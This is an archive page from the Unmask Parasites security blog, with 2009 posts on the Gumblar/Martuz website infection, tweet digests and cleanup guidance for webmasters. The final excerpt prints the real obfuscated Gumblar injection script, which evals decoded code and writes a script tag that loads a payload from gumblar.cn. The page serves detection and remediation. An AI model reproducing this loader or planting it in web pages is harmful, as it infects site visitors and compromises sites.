msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

List of Gumblar Zombie URLs

18 Dec 09   Filed in Website exploits with 12 Comments

My list of Gumblar zombie URLs that I originally posted and updated in the Revenge of Gumblar Zombies article, have already reached the size of 1,400+ items, which makes the web page too heavy.

I decided to move this list to a separate page to make the original post less cluttered. At the same time the list should remain searchable via major search engines and webmasters of compromised sites will be able to find this page that contains a direct link to the post with Gumblar infection details and removal instructions.

Gumblar infection is pretty sophisticated and removing the malicious code is usually not enough to completely clean up your site. If this page contains a URL that was a part of the suspicious code injected into your sites’ web pages and .js files, make sure to read the following post.
The list »»

Tweet Week: Nov 30 – Dec 6, 2009

06 Dec 09   Filed in Tweet Week with Comments Off

Selected short messages and links you might have missed if you don’t follow me on Twitter.

IE and Typo3 vulnerabilities, WordPress attack, Twitter API in malicious scripts »»

Tweet Week: Nov 9-15, 2009

15 Nov 09   Filed in Tweet Week with Comments Off

Selected short messages and links you might have missed if you don’t follow me on Twitter.

WordPress, Twitter, passwords, gumblar … »»

Tweet Week: Nov 2-8, 2009

08 Nov 09   Filed in Tweet Week with Comments Off

Selected short messages and links you might have missed if you don’t follow me on Twitter.

Nov 2, 2009

Mal/Iframe-N: Another winning infection? – Sophos on malicious iframes (with references to my blog posts)

Nov 3, 2009

[link:cantonbecker.com] How to search for ‘backdoors’ in a hacked WordPress site

Nov 5, 2009

Story about Gumblar breaking WordPress on The New York Times site  – based on my latest blogpost. Thanks @bobmcmillan

[link:h-online.com] new security patches for Java and Shockwave Player

Nov 6, 2009

SCMagazine mentions my blog in their article “Gumblar site infections return, WordPress among affected

Found an AdSense ad that offers to download pirated version of Avast Pro (probably infected). Reported it to Google. (lifeplain .com is a scam)

If you want more real-time experience, you can follow @unmaskparasites on Twitter.

Similar posts:

Gumblar Breaks WordPress blogs and other complex PHP sites

04 Nov 09   Filed in Website exploits with 16 Comments

Not only iframe infections can corrupt websites. It appears that the current version of Gumbar effectively breaks WordPress blogs.
Here’s the story »»

Revenge of Gumblar Zombies

23 Oct 09   Filed in Website exploits with 50 Comments

Do you remember Gumblar? The massive hacker attack that managed to infect more than a hundred thousand legitimate web sites in a very short time this May? The infection was relatively easy to detect but very hard to completely get rid of. It infected various types of files and created backdoor scripts in inconspicuous places of websites so that hackers could easily restore the malicious content.

The gumblar .cn site (and its immediate successor martuz .cn) had been promptly shut down. As a result,the malicious script injected into hacked websites became harmless for site visitors. However, many webmasters failed to properly clean up their sites after the Gumblar infection, leaving the backdoor scripts intact. It was predicted that hackers would find the way to utilize this army of potentially controllable websites. Now, five months later, we see a new surge of a massive attack that resembles Gumblar in many aspects.
Continue »»

Gumblar/Martuz Aftermath

26 May 09   Filed in Tips and Tricks, Website exploits with 10 Comments

The Gumblar/Martuz epidemic is currently on decline. Comparing with the last week, this week Unmask Parasites registers only a small fraction of Gumblar infected web sites. And I don’t see any new script mutations.

“Martuz .cn” domain no longer resolve and “gumblar .cn” is defunct (the domain is currently parked). This has stopped the surge of new infections. And the increased global awareness helped webmasters identify the problem and get rid of it.

Recovered sites are still blacklisted

Nonetheless, I can still see that many websites recovered from the gumblar/martuz attack are still blacklisted by Google. Their Safe Browsing diagnostic pages say something like:
Continue »»

Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New?

18 May 09   Filed in General, Website exploits with 40 Comments

Gumblar is dead

Many people have noticed that “gumblar .cn” no longer resolve. The site cannot be accessed. Thus the gumblar script is no longer able to load the malicious payload and infect new computers and websites. Great!

Meet the Martuz

The loss of the gumblar .cn domain name can’t stop hackers. They have slightly modified the script and now inject a new version that loads malicious content from a new domain – martuz .cn (95 .129 .145 .58)
Continue »»

A Few More Facts About the Gumblar Attack From SophosLab and ScanSafe.

15 May 09   Filed in General with 14 Comments

The Gumblar exploit seems to be the biggest exploit I’ve ever reviewed in my blog. About a thousand visitors come to read my article about Gumblar every day. This exploit accounts for about 80% of positives on Unmask Parasites and I still don’t see any sign of its decline.

I found some more interesting facts about this exploit in SophosLab’s and ScanSafe’s blogs and would like to share them with you.
Continue »»

Gumblar .cn Exploit – 12 Facts About This Injected Script

07 May 09   Filed in Website exploits with 194 Comments

I’ve been watching this exploit for about a week now.  During the last couple of days it became the prevailing problem detected by Unmask Parasites.

I don’t have reliable information about how the infection occurs. However I have compiled a list of facts that might be useful if you are fighting this exploit.

1 Infected web pages contain a script that looks like this

(function(jil){var xR5p='%';e val(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);
Continue »»